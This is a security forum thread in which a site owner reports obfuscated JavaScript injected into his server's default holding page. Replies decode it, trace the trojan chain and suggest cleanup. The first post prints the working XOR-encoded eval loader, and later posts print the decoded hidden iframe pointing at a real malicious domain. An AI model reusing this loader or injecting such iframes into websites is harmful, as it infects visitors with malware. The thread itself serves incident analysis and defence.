Results 1 to 10 of 10

Thread: Virus code on a webpage?

  1. #1

    Virus code on a webpage?

    I found this code lurking on one of my webpages that was mysteriously uploaded

    It downloads a trojan apparently each time a person visited a page on my site

    does anyone knwo what this code is and whats its translated too???


    <script>x=94;es="58;48;3;20;15;6;10;17;72;16;26;0;30;14;68;74;82;6;22;3;19;30;17;85;5;5;27;68;88;19;8;9;14;69;175;174;245;244;243;171;228;226;251;253;249;252;234;163;237;224;253;190;251;253;240;240;238;185;232;241;234;185;188;234;247;251;212;201;159;147;132;205;195;206;207;193;222;150;156;147;146;128;217;215;192;210;217;208;136;144;145;130;";var ds=new String();ads=es.split(";");k=ads.length-1;for(var j=0;j<k;j++){e=ads[j];gg="d=e";gg=gg+"^x";eval(gg);x+=1;ds=ds+String.fromCharCode(d);}eval(ds)</script></body>

  2. #2
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    It looks vaguely like the SCOB javascript trojan or some sort of variant?


  3. #3
    AO's MMA Fanatic! Computernerd22's Avatar
    Join Date
    Mar 2003
    Location
    Miami, FL
    Posts
    795
    I found this code lurking on one of my webpages that was mysteriously uploaded
    Nihil. I tried giving you (+) points but

    You have given out too many AntiPoints today, try again later.
    So when I have the chance I will.

    Back to the issue at hand Mysteriously uploaded? Hmmm. I am assuming your website is www.siteprosecurity.com which page has the malicious code on it? I checked it's not the index page? I also, wanted to see what webserver is running your site.

    http://toolbar.netcraft.com/site_rep...rosecurity.com

  4. #4
    Originally posted here by Computernerd22
    Nihil. I tried giving you (+) points but



    So when I have the chance I will.

    Back to the issue at hand Mysteriously uploaded? Hmmm. I am assuming your website is www.siteprosecurity.com which page has the malicious code on it? I checked it's not the index page? I also, wanted to see what webserver is running your site.

    http://toolbar.netcraft.com/site_rep...rosecurity.com
    hey!

    Actually nah its not on the siteprosecurity site dont have that no more first time ive posted here in 2 yrs

    It was actually on my webserver under the cpanel skelton directory

    i registered a domain name for a client today and have this default holding page for all new clients and that code appeared somehow on the default holding page!

    im running apache/linux on my server!

    cheers!

  5. #5


    It translates to:
    PHP Code:
    <iframe src="http://www.bestswf.com/index.php" width=0 height=0></iframe&gt
    That site then tries to load /xxx.ani, which in turn will go for: (sanitized URL)
    htXtp://www.bestswf.com/web.exe

    web.exe will use some code known as EliRT 1.01, which looks like rootkit stuff.

    Virustotal doesn't like web.exe

    Have fun nihil!

    edit...

    by the way siteprosecurity , that means you've been owned

  6. #6
    hmm thanks for that

    ok owned i guess means that some person has had access to the root of the server?

    everything else seems to be intact and all although last weekend i do remember the server suffering badly and alll but its been ok since then?

    anyone got tips to move on from here?

    i have rkhunter installed did not pick up anything

  7. #7
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    Hmmmmmmmmmmmm,

    EliRT 1.01 is a .dll injector.....................seems to be used by backdoor CIAdoor 124a

    It is a Russian website set up in November Seems to be a privately owned domain so I would imagine the purpose is fraud.

    A-Squared and EWIDO were NOT IMPRESSED ..................they have probably crossed me off their Christmas list

    The actual malware is Windows specific.

    You might try 020-7230-1212.....................the Fraud Squad are normally only interested in crimes over £75,000, but I suspect that these people are not conducting an academic exercise?

    This link may help:

    http://www.fraudaid.com/How-To-Deal-...otlandYard.htm

    I would guess that Interpol are the people to handle it in the end?

    Good luck

  8. #8
    Originally posted here by siteprosecurity
    hmm thanks for that

    ok owned i guess means that some person has had access to the root of the server?
    You probably have some hidden files located on the server. I've found them hidden in the recycle bins in the past, and in some of the OS system folders. I'd use the Sysinternals Rootkit Revealer and do some safemode hunting. 'course, first thing is to change all the local admin passwords, domain passwords and check for odd new local accounts.

    [Edit]
    Or, if you take nihil's suggestion, just unplug from the net, isolate and wait for the forensics team.
    [/Edit]

  9. #9
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    To find out how Soda_Popinsky got the <iframe> tag...

    (I'm going to assume windows to find out what it does)
    The piece of script is javascript.. Copy 'n past the code into notepad and save as test.js
    Then edit it a bit to make it more readable...

    Code:
    x=94;
    es="58;48;3;20;15;6;10;17;72;16;26;0;30;14;68;74;82;6;22;3;19;30;17;85;5;5;27;68;88;19;8;9;14;69;175;174;245;244;243;171;228;226;251;253;249;252;234;163;237;224;253;190;251;253;240;240;238;185;232;241;234;185;188;234;247;251;212;201;159;147;132;205;195;206;207;193;222;150;156;147;146;128;217;215;192;210;217;208;136;144;145;130;";
    var ds=new String();
    ads=es.split(";");
    k=ads.length-1;
    for(var j=0;j<k;j++){
       e=ads[j];
       gg="d=e";
       gg=gg+"^x";
       eval(gg);
       x+=1;
       ds=ds+String.fromCharCode(d);
    }
    
    WScript.Echo(ds)
    Change that last eval statement into a WScript.Echo (bold in the code) and run it with cscript..

    What it basicly does is it splits the string es into it's seperate pieces.. For the first one e becomes 58. gg will contain d=e^x, x=94 at first. After the eval statement d=100 (d=58 XOR 94). You can change the whole gg=.... eval(gg) into d=e^x. Next it adds 1 to x for the next round. Then it converts the decimal 100 into it's ASCII character (d) and adds it to ds. The last statement (eval; which I changed to WScript.Echo) executes the string ds (which at the end contains 'document.write('<iframe src="http://www.bestswf.com/index.php" width=0 height=0></iframe>');').


    anyone got tips to move on from here?
    Yep.. Backup all the important stuff and reinstall the server from scratch using the original installation CD's. Don't forget to patch it afterwards (and plug the hole they used to get in)..
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  10. #10
    Senior Member
    Join Date
    Dec 2004
    Posts
    320
    well I gotta ask. Couldn't this, (and most likely) be a XSS attack. I dont know if they comprimised root... On you web page(s), do you use any .php or .asp or anything similarily dynamic ? Are you sure it was an 'uploaded' page and not XSS ?
    The fool doth think he is wise, but the wiseman knows himself to be a fool - Good Ole Bill Shakespeare

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •